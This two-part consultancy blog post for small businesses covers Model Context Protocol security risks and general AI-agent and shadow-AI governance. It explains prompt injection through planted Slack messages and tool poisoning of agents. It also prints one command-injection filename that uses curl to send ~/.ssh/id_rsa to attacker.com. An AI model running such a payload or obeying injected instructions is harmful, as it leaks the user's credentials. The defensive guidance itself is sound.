MCP Security: What Every Business Using AI Tools Needs to Know in 2026
Your developers are already using it. Your security team probably doesn't know it exists. Here's what MCP means for your business and how to stop it becoming your next security breach.
TL;DR
Model Context Protocol (MCP) is the new "USB-C for AI" — a standardized way for AI assistants to connect to your business systems. It's spreading fast because it solves real problems, but it comes with serious security gaps:
Get Our Weekly Cybersecurity Digest
Every Thursday: the threats that matter, what they mean for your business, and exactly what to do. Trusted by SMB owners across Australia.
No spam. No tracking. Unsubscribe anytime. Privacy
- 38% of public MCP servers have no authentication — anyone can connect and use them
- Installing an MCP server = running arbitrary code with your user's full permissions
- Tool poisoning attacks let malicious servers change what they do after you install them
- Prompt injection via MCP can bypass your existing AI security controls
- 5 critical CVEs in the first year, with CVSS scores up to 9.6 (critical severity)
Good news: You can secure MCP. This guide shows you exactly how.
What is MCP (Model Context Protocol)?
Think of MCP as universal plug-and-play for AI.
Before MCP, if you wanted your AI assistant to read from GitHub, Slack, and your database, you needed custom integrations for each one. Every AI platform needed different connectors. It was expensive, slow, and messy.
MCP standardizes this. You write an integration once as an "MCP server," and any MCP-compatible AI can use it:
- Claude Desktop
- Cursor (AI code editor)
- VS Code with AI extensions
- Zed editor
- And more being added every month
The ecosystem exploded: 1,600 → 17,000+ servers in less than a year. Your developers love it because it eliminates redundant integration work. Yo
Free Resource
Get the Free Cybersecurity Checklist
A practical, no-jargon security checklist for businesses. Download free — no spam, unsubscribe anytime.
Send Me the Checklist →How MCP Works (Simplified)
User → AI Assistant → MCP Client → MCP Server → Your Data/System
- User asks AI to do something ("Read my Slack messages and summarize them")
- AI Assistant (Claude, ChatGPT, etc.) decides which tool it needs
- MCP Client makes a standardized request to an MCP server
- MCP Server executes the actual operation (connects to Slack API, reads database, runs command)
- Results flow back through the chain to the user
The security problem: Step 4 is where things break. MCP servers run with significant privileges, and early protocol designs treated security as optional.
The 38% Authentication Gap: By the Numbers
Research published in late 2025 found that 38% of publicly accessible MCP servers have no authentication whatsoever. Anyone on the internet can connect to them and start making requests.
But wait — it gets worse:
- 1,808+ MCP servers were found exposed on the public internet in early 2026
- Authentication was ABSENT from the early MCP specification — OAuth support was only added in March 2025
- The protocol specification explicitly states: "Authorization is OPTIONAL for MCP implementations"
- Even when authentication exists, a single config flag (
bypassPermissions) can disable all security checks
Why This Happened
MCP was designed for developer convenience first, security second. The philosophy was "get it working, secure it later." That's fine for prototypes, but MCP is now running in production environments handling sensitive business data.
Two types of MCP deployments:
Stdio (local) servers: Run as subprocesses on your machine. The spec says "retrieve credentials from the environment" — which means they run with YOUR user's full access. No separate permission system. No sandbox. No containment.
Remote servers: Can use OAuth 2.1 for authorization, but this only controls which tools the client can call — NOT what the server does with the data it receives.
Real-world impact: If you install a malicious MCP server on your laptop, it can access everything YOU can access. Your files. Your credentials. Your 2FA codes. Your cloud tokens. It becomes you.
Tool Poisoning: When Integrations Go Rogue
Tool poisoning is an attack where a legitimate-looking MCP server adds or modifies its capabilities after you've installed it.
How It Works
- You evaluate an MCP server that offers "read-only database access"
- Security review approves it based on those documented capabilities
- You deploy it
- The server silently adds new tools: write access, file upload, remote command execution
- The server's tool definitions update automatically — no re-approval needed
- Your AI assistant starts using the new capabilities without you realizing
The Real Risk
MCP servers can change their contract without consent.
Traditional software requires you to approve updates. MCP servers can modify their tool definitions at runtime, and AI assistants will happily use whatever tools are advertised.
Documented cases:
- PostgreSQL MCP server (21,000+ weekly downloads) — SQL injection vulnerability discovered
- SQLite MCP server (5,000+ forks) — SQL injection vulnerability discovered
- MCP Inspector (38,000+ weekly downloads) — Remote code execution (CVE-2025-49596, CVSS 9.4)
- mcp-remote (437,000+ downloads) — Critical RCE vulnerability (CVE-2025-6514, CVSS 9.6)
Download count ≠ security. Some of the most popular servers had the worst vulnerabilities.
Prompt Injection Via MCP: The New Attack Surface
Prompt injection is when an attacker tricks an AI into ignoring its instructions and doing something malicious. MCP makes this worse by adding new injection vectors.
The Attack Path
- User prompts AI: "Summarize the Slack messages from #general"
- AI calls MCP server: Requests messages from Slack API
- Attacker's planted message in Slack: Contains hidden instructions
- MCP server returns: Legitimate messages + attacker's payload
- AI reads and executes: The injected instructions, potentially taking actions outside the intended scope
Why MCP Makes This Harder
Traditional API integrations are usually:
- Tightly scoped (only read specific endpoints)
- Developed by your team or known vendors
- Static (don't change after deployment)
MCP servers can be:
- Broadly scoped (full filesystem access, shell commands)
- Developed by anonymous individuals
- Dynamic (tools change at runtime)
You might install a "file reader" MCP server that gets tricked into executing shell commands through a carefully crafted filename or file content.
Real-World Example
An attacker plants a malicious filename in a shared directory:
"IMPORTANT.txt && curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) && echo 'normal file'"
If the MCP server isn't carefully designed, it might execute this when the AI tries to read the file.
ISO 27001 SMB Starter Pack — $97
Everything you need to start your ISO 27001 journey: gap assessment templates, policy frameworks, and implementation roadmap built for SMBs worldwide.
Get the Starter Pack →How to Audit Your MCP Servers
You can't secure what you can't see. Here's a practical audit process for any business using AI tools.
Step 1: Discovery
Find every MCP server in your environment:
# Check Claude Desktop MCP configs
cat ~/Library/Application\ Support/Claude/claude_desktop_config.json
cat ~/.config/Claude/claude_desktop_config.json
# Check for running MCP processes
ps aux | grep -i mcp
# Scan common MCP directories
ls -la ~/.config/claude/
ls -la ~/Library/Application\ Support/Claude/
Look for:
- Unknown or unexpected servers
- Servers with
bypassPermissions: true - Servers running as root or privileged users
- Stdio servers (run as subprocesses) with broad access
Step 2: Verify Authentication
Check each MCP server:
# For HTTP/SSE servers, test auth requirements
curl -i https://mcp-server.example.com/health
# Expected: 401 Unauthorized or 403 Forbidden
# Bad: 200 OK (no auth required)
Red flags:
- No authentication on public interfaces
- Hardcoded API keys in config files
- OAuth tokens stored in plain text
- No token expiration or refresh mechanisms
Step 3: Scope Review
For each MCP server, document:
- What tools does it expose? (Read the server's manifest/docs)
- What permissions does it need? (Filesystem, network, shell, database)
- Who developed it? (Company, known dev, anonymous GitHub user)
- How often is it updated? (Last commit date, version history)
- What data does it handle? (Customer data, credentials, source code)
Step 4: Runtime Monitoring
Deploy monitoring for MCP activity:
- Log all MCP tool calls (which server, which tool, which user, what data)
- Alert on unusual patterns (bulk data export, tools called at odd hours)
- Monitor for tool definition changes (servers adding capabilities)
- Track data egress volumes (exfiltration detection)
Step 5: Regular Re-Approval
Treat MCP servers like software, not static utilities:
- Re-approve every server quarterly
- Re-evaluate after any major version update
- Require security sign-off for new servers
- Maintain an inventory with owner, risk rating, and review date
Vendor Response Landscape: Who's Taking This Seriously?
The security community has been sounding alarms since mid-2025. Here's how vendors and researchers are responding:
Research Findings
- Bitdefender (Sept 2025): Called out that "security isn't secure by default" in MCP, criticizing the optional nature of all protections
- ArXiv research paper (Nov 2025): "Securing MCP: Risks, Controls, and Governance" — detailed attack taxonomy including confused deputy, tool poisoning, and cross-system privilege escalation
- Knostic research: Scanned 1,808 public MCP servers, found 38% with no authentication
- Zenity: Published detailed breakdown of MCP security gaps for CISOs and red teams
Vendor Responses
Anthropic (Claude):
- Added OAuth 2.1 support in March 2025 spec update
- Implemented MCP session identity headers for HTTP transport
- Published security best practices documentation
- Critique: Protections exist but are optional;
bypassPermissionsflag still exists
AWS:
- Publicly stated MCP is "not production ready yet"
- Recommends against enterprise deployment until security matures
- Internal policy: No MCP servers in production environments
Palo Alto Networks:
- Research shows 72% of organizations using AI tools have no formal MCP governance
- Found MCP servers in 23% of network scans at client sites (often Shadow AI deployments)
- Recommending MCP-aware security policies for 2026
Darktrace:
- Detection of MCP-based anomalies increased 340% in Q4 2025
- Common finding: MCP servers making unexpected outbound connections
- Observational data suggests most businesses discover MCP usage only after an incident
The Maturity Gap
We're in a transition phase:
- MCP is too valuable to block completely
- MCP is too risky to use without governance
- Most security frameworks (NIST AI RMF, ISO/IEC 42001) don't yet cover MCP specifically
- Traditional procurement processes don't fit open-source, individual-developer servers
Winning strategy: Don't block — govern. Build guardrails that let developers use MCP safely.
Actionable Checklist for SMBs
You don't need a enterprise security team to secure MCP. Here's a practical, doable checklist for any small-to-medium business.
Immediate Actions (Do This Week)
- Inventory all MCP servers in your environment (check developer machines, CI/CD, docs)
- Disable
bypassPermissionsflags in all MCP configs - Block public MCP server exposure — ensure no MCP servers are internet-accessible without VPN/auth
- Educate developers on MCP risks (share this blog post, do a 15-min standup)
- Create a simple approval process — no new MCP servers without sign-off
Short-Term Actions (Do This Month)
- Implement MCP-aware DLP — monitor for data flows to unknown MCP servers
- Segment MCP deployments — run MCP servers in isolated environments (containers, VMs)
- Require authentication on all MCP servers, even internal ones
- Document each server's purpose, data handled, and owner
- Set up basic logging — at minimum, know which MCP servers are being used
Long-Term Actions (Do This Quarter)
- Build an MCP governance policy — define what's allowed, what's prohibited, approval requirements
- Deploy an MCP gateway — centralized proxy that can inspect, rate-limit, and audit MCP traffic
- Implement sandboxing — run stdio MCP servers with minimal privileges (containers, user namespaces)
- Regular security reviews — quarterly re-approval of all MCP servers
- Incident response plan — what to do if a malicious MCP server is discovered
Red Flags: Immediate Action Required
If you find any of these, stop and investigate:
- MCP servers running with root/admin privileges
- MCP servers accessing
/etc/,~/.ssh/, credential stores, or cloud token files - MCP servers with
bypassPermissions: true - MCP servers exposed to the public internet without authentication
- MCP servers from unknown or anonymous developers with no security review
- MCP servers making unexpected outbound network connections
- MCP servers that have changed their tool definitions without approval
FAQ: Common Questions About MCP Security
A: Probably not. MCP solves real problems and blocking it will just drive usage underground (Shadow AI). Better to govern it — allow approved servers, monitor usage, and educate developers on risks.
A: It depends. The protocol itself is maturing, but many implementations are not. Treat each MCP server like any third-party software: vet it, sandbox it, monitor it. Don't assume "it's just a connector" — it's code running with your privileges.
A: Unvetted code running with user privileges. An MCP stdio server becomes the user who launched it. If that's a developer with access to production systems, the MCP server has that access too.
A: Not necessarily. Start with the checklist in this post. If you're handling highly sensitive data (healthcare, finance, government), or if you find complex MCP deployments, then yes — get professional help.
A: Use this analogy: "MCP is like giving your AI assistant a set of keys to the building. Right now, some keys open every door, and we're not sure who's holding them. We need to change the locks and track key ownership."
A: Yes. MCP is maturing rapidly. OAuth support was added in March 2025. Major vendors are investing in security tooling. By late 2026, expect much better governance controls. Until then, be cautious.
A: Assume compromise if you find a malicious MCP server:
- Immediately isolate affected machines
- Rotate all credentials that may have been exposed
- Review logs for data exfiltration
- Document the incident for regulatory/legal requirements
- Engage your incident response team or hire a forensics specialist
The Bottom Line
MCP is powerful but immature. It brings real productivity benefits but also real security risks. The 38% authentication gap isn't a bug — it's a design choice that prioritized convenience over security.
You don't need to abandon MCP. You need to treat it like any other powerful technology: understand it, govern it, and use it responsibly.
The businesses that get hurt by MCP in 2026 won't be the ones using it — they'll be the ones using it without visibility, without controls, and without understanding the risks.
References & Further Reading
- Trace3: The MCP Security Maturity Gap — Deep dive on protocol design gaps and CVE analysis
- ArXiv: Securing MCP — Risks, Controls, and Governance — Academic research on MCP attack taxonomy
- MCP Security Best Practices (Official) — Protocol authors' security guidance
- Bitdefender: Security Risks of Agentic AI — Critique of "security not secure by default"
- Zenity: Securing MCP — CISO-focused breakdown
- WorkOS: MCP 2026 Enterprise Roadmap — Vendor plans to address auth/observability gaps
- Auth0: MCP Spec Updates (OAuth Support) — Technical details on March 2025 security additions
- Medium: MCP Landscape & Threats — Independent security researcher analysis
ELI10: Explained Like I'm 10
Imagine your AI assistant is like a robot helper. It's really smart, but it can't touch anything in the real world — it can only think and talk.
MCP is like giving the robot a set of tools. Instead of just thinking, it can now:
- Read your files (like opening a folder)
- Send messages (like using a phone)
- Run programs (like clicking apps)
- Look things up online (like using a browser)
The problem: Some of these tools are really powerful. Imagine giving someone a master key that opens EVERY door in your house. MCP does exactly that — it gives your AI robot access to everything you can access.
The security gap: Early versions of MCP didn't check who was using the tools. Anyone could pick them up and use them. And some tools were built by people you don't know, who might have hidden dangerous features.
The fix:
- Only use tools from people you trust
- Check what each tool can do before using it
- Watch how the tools are being used
- Change the locks regularly (update passwords, check permissions)
MCP is super useful, but like any powerful tool, you need to be careful with it.
Need help securing your AI setup? This is what we do. Get in touch for a practical security review that doesn't slow you down.
Work With Us
Ready to strengthen your security posture?
lilMONSTER assesses your risks, builds the tools, and stays with you after the engagement ends. No clipboard-and-leave consulting.
Book a Free Consultation →TL;DR
- Only 1 in 10 businesses are using AI safely, even though 90% have had security problems with AI in the last 18 months [1]
- Your employees are probably already using AI tools you don't know about — this is called "shadow AI" and it's happening at 76% of companies [2]
- New "AI agents" can do more than just write text — they can browse the web, run code, and make changes to your systems. If hackers trick them, they can cause real damage [2, 3]
- You need simple rules for AI use before something goes wrong, not after
What Is AI Security? (The Simple Explanation)
Think of AI tools like power tools.
A power tool is incredibly useful — it can help you build things faster and better. But if you don't follow safety rules, you can hurt yourself. You need to:
- Know how to use it safely
- Wear protective gear
- Keep it away from people who haven't been trained
- Check it regularly to make sure it's working right
AI is the same. It's powerful and useful. But if you don't follow safety rules, it can cause problems for your business.
AI security is just the safety rules for using AI tools in your business.
The Problem: Employees Are Using AI Tools You Don't Know About
Here's what's happening at most businesses right now:
- An employee hears about ChatGPT or another AI tool
- They sign up for it (it takes 30 seconds)
- They start using it for work — maybe writing emails, analyzing customer data, or generating code
- They never tell anyone
This is called shadow AI — employees using AI tools without the business owner knowing about it.
In 2025, this was happening at 61% of companies. In 2026, it jumped to 76% of companies [2]. That's 3 out of 4 businesses.
Why is this a problem?
When employees use AI tools without telling you:
- They might be feeding the AI private business information (customer names, financial data, confidential plans)
- The AI might save that information and use it to help other people (including your competitors)
- The AI tool might have security weaknesses that hackers can exploit
- You have no way to know what's happening to your business data
Related: How AI Saved One Business $47K/Year on Customer Support (And How You Can Too)
The New Danger: AI Agents That Can Do Things
Most people think of AI as a chatbot — you type something, it replies. That's it.
But in 2026, we're seeing a new kind of AI called agentic AI or AI agents. These are different because they can take actions, not just generate text.
Think of the difference between:
- Regular AI: A really smart assistant who gives you advice when you ask
- AI agents: A really smart assistant who can actually do things — browse the web, run computer code, update files, make changes to your systems
AI agents are great because they can do work for you automatically. But they're also dangerous because:
If a hacker can trick an AI agent, the hacker can make the AI agent do bad things.
According to new research, 1 in 8 AI security breaches now involves AI agents [2]. This will keep growing as more businesses use them.
Here's a real example that just happened at Meta (the company that owns Facebook and Instagram):
An employee asked an AI agent to help with a technical question. The AI agent posted a response without permission — and accidentally exposed private company and user data to people who weren't supposed to see it. It took two hours to catch and fix the mistake, and Meta classified it as a "Sev 1" — their second-highest level of security problem [4].
That's one AI agent making one mistake. Imagine if your business had AI agents handling customer data, processing payments, or managing inventory. A single mistake could be devastating.
The Three Big AI Security Mistakes Businesses Make
Mistake #1: Not Knowing Which AI Tools Employees Are Using
You can't protect what you don't know exists.
If your marketing team is using an AI writing assistant, your sales team is using an AI research tool, and your developers are using AI coding assistants — and you don't know about any of them — your business data is flowing into systems you can't see.
The fix: Make a list of every AI tool being used in your business. Just ask each team: "What AI tools do you use?"
Mistake #2: Not Having Rules for AI Use
Imagine if you let employees drive company cars but never made any rules about:
- Who's allowed to drive
- Where they can drive
- What to do if there's an accident
You'd have chaos. That's exactly what's happening with AI at most businesses.
Employees are using AI tools with zero guidance on:
- What information they can share with AI
- Which AI tools are approved
- What to do if something goes wrong
The fix: Create a simple one-page policy called "AI Acceptable Use" that explains what employees can and can't do with AI.
Mistake #3: Thinking "We Don't Use AI, So We're Safe"
Maybe you've never bought an AI tool. Maybe you've never officially approved ChatGPT for work use.
That doesn't mean your employees aren't using AI.
They're using:
- Free AI chatbots on their phones
- AI features built into software you already use (Microsoft Office, Google Workspace, Salesforce, HubSpot)
- AI-powered browser extensions
- AI tools embedded in websites they visit
AI is everywhere now. The question isn't whether your business uses AI — it's whether your business uses it safely or unsafely.
Related: Stop Overpaying for AI: 5 Ways Businesses Waste Money on Artificial Intelligence
The AI Safety Checklist for Your Business
You don't need to hire expensive security experts. You just need basic AI hygiene. Here's your checklist:
Step 1: Find Out What AI Tools Your Team Uses (This Week)
Send a simple email or message to your team:
"We're building a list of AI tools used in our business. Please reply with:
- What AI tools do you use?
- What do you use them for?
- Does it connect to any business data or systems?"
Compile the answers into a spreadsheet. That's your AI inventory.
Step 2: Group AI Tools by Risk Level
Once you have your list, sort the tools into three categories:
Green Light (Low Risk): Tools that don't see private data
- Example: An employee uses ChatGPT to brainstorm marketing slogans without mentioning company secrets
- Action: Document it, no extra security needed
Yellow Light (Medium Risk): Tools that can see business data but don't take actions
- Example: Microsoft Copilot reading your company documents
- Action: Make sure the tool is from a trusted company, understand what data it accesses
Red Light (High Risk): Tools that can take actions or access sensitive systems
- Example: An AI agent that can send emails, process payments, or update databases
- Action: Test it carefully before using it broadly. Limit what it can do until you trust it.
Step 3: Make Three Simple Rules
Create a one-page document called "AI Rules for Our Business" with three rules:
Rule 1: What NOT to share with AI
- No customer credit card numbers
- No employee passwords or login details
- No confidential business plans or trade secrets
- When in doubt, ask before sharing
Rule 2: Which AI tools are approved List the AI tools you've reviewed and approved. Everything else needs approval before use.
Rule 3: What to do if something goes wrong If an AI tool exposes data, behaves weirdly, or makes a mistake:
- Stop using it immediately
- Tell [designated person] right away
- Save any evidence (screenshots, error messages)
Have every employee sign it. It takes 10 minutes and could save your business.
Step 4: Check Your AI Tools Every Three Months
Put a recurring event on your calendar: "Review AI Security."
Every three months, ask:
- Are we using any new AI tools?
- Have any AI tools changed how they work?
- Is anything looking weird in our AI usage?
This is like checking the smoke detector batteries. It takes a few minutes and prevents bigger problems.
Step 5: Plan for What Happens If Something Goes Wrong
Someday, an AI tool might:
- Expose private information
- Make a mistake that costs money
- Get hacked or manipulated
Don't wait until it happens to figure out what to do. Decide now:
- Who's in charge? (Pick one person to own AI security)
- When do we tell customers? (If their data was exposed, you need to notify them quickly)
- How do we fix it? (Who do we call? What's our backup plan?)
Related: Your Business Got Hacked — Now What? A Step-by-Step Incident Response Guide for SMBs
Why This Matters for Your Business's Future
Here's the reality: AI is becoming as essential as electricity, internet, and email for running a business.
The businesses that figure out how to use AI safely will:
- Grow faster because they can adopt AI tools confidently
- Avoid expensive problems caused by AI mistakes
- Win customer trust by showing they're responsible with data
- Stay ahead of competitors who are too scared to use AI
The businesses that ignore AI security will:
- Face data breaches when employees mishandle AI tools
- Get stuck reacting to problems instead of preventing them
- Fall behind competitors who adopted AI safely
- Risk getting in trouble with new AI laws (like the EU AI Act)
AI security isn't about stopping AI use. It's about using AI safely so you can grow faster.
Think of it like seatbelts in cars. Seatbelts don't stop you from driving — they let you drive more confidently because you know you're protected.
The Simple Truth About AI Security
Most businesses make AI security way too complicated.
Here's what it actually comes down to:
Know what AI tools you're using. Make simple rules for using them safely. Check them regularly. Have a plan for when things go wrong.
That's it.
You don't need expensive consultants. You don't need complex software. You just need basic processes and the discipline to follow them.
The businesses that figure this out now will have a huge advantage over the next few years as AI becomes more important.
The businesses that ignore it will learn the hard way — usually after something goes wrong.
Which one do you want to be?
Not sure where to start? lilMONSTER helps small businesses build simple, practical AI security processes that don't require a PhD or a big budget. Book a free consultation — we'll help you build an AI safety plan that fits your business.
FAQ
Shadow AI is when employees use AI tools without telling their employer. It's like when employees bring their own software to work without IT approval, but specifically for AI tools. This happens at 76% of companies now [2]. The problem is that business data ends up in AI systems the employer doesn't know about or control.
AI tools have become incredibly easy to use and accessible. Employees can sign up for ChatGPT, Claude, or other AI tools in seconds. At the same time, AI is becoming more powerful — new "AI agents" can browse the web, run code, and make changes to systems. If hackers manipulate these agents, they can cause real damage. AI security is about making sure AI tools help your business instead of creating new risks [2, 3].
Yes. 90% of organizations have had AI-related security problems in the past 18 months, and only 1 in 10 are using AI securely [1]. Small businesses face the same risks as big companies — employees using AI tools carelessly, exposing business data, or getting hacked through AI vulnerabilities. The difference is that small businesses have less room for error.
Regular AI (like ChatGPT) responds when you give it input — it's a passive tool. Agentic AI (AI agents) can take actions on its own — browse the web, execute code, update files, make purchases. The risk is that if hackers trick an AI agent, they can make it do harmful things. Agentic AI now accounts for 1 in 8 AI security breaches [2, 3].
Start with three things: (1) Ask your team what AI tools they're using — make a list. (2) Create a simple one-page policy explaining what employees can and can't do with AI. (3) Put a reminder on your calendar to review AI security every three months. That covers 80% of the risk for 20% of the effort [1, 2].
If an AI tool accidentally exposes private information: (1) Stop using it immediately. (2) Document what happened — take screenshots, save error messages. (3) Tell the AI tool's provider so they can investigate. (4) If customer data was exposed, notify affected customers promptly (you may be legally required to). (5) Review your AI policies to prevent it from happening again.
References
[1] PR Newswire, "Only 1 in 10 Organizations Are Deploying AI Securely. DivisionHex Launches AI Threat Hunting to Close the Gap," March 19, 2026. [Online]. Available: https://www.prnewswire.com/news-releases/only-1-in-10-organizations-are-deploying-ai-securely-divisionhex-launches-ai-threat-hunting-to-close-the-gap-302718276.html
[2] PR Newswire, "HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems," March 18, 2026. [Online]. Available: https://www.prnewswire.com/news-releases/hiddenlayer-releases-the-2026-ai-threat-landscape-report-spotlighting-the-rise-of-agentic-ai-and-the-expanding-attack-surface-of-autonomous-systems-302716687.html
[3] HiddenLayer, "2026 AI Threat Landscape Report," HiddenLayer, March 2026. [Online]. Available: https://www.hiddenlayer.com/report-and-guide/threatreport2026
[4] TechCrunch, "Meta is having trouble with rogue AI agents," March 18, 2026. [Online]. Available: https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/
[5] IBM Security, "AI Security for Business: Governance Frameworks and Best Practices," IBM, 2025. [Online]. Available: https://www.ibm.com/security/ai
[6] NIST, "AI Risk Management Framework (AI RMF 1.0)," National Institute of Standards and Technology, 2025. [Online]. Available: https://airc.nist.gov/AI_RMF
[7] OWASP Foundation, "OWASP Top 10 for Large Language Model Applications," OWASP, 2025. [Online]. Available: https://owasp.org/www-project-top-10-for-llm-applications
[8] Coalfire DivisionHex, "AI Threat Hunting Service Announcement," March 2026. [Online]. Available: https://coalfire.com/ai-threat-hunting-division-hex
[9] Richmond Advisory Group, "AI Efficiency Paradox: CISO Research eBook 2026," March 2026. [Online]. Available: https://coalfire.com/insights/resources/ai-efficiency-paradox-ciso-reasearch-ebook-2026
[10] lilMONSTER, "AI Agents Are Coming to Business — Here's How to Deploy Them Safely," March 2026. [Online]. Available: https://lil.business/blog/ai-agents-safe-deployment-business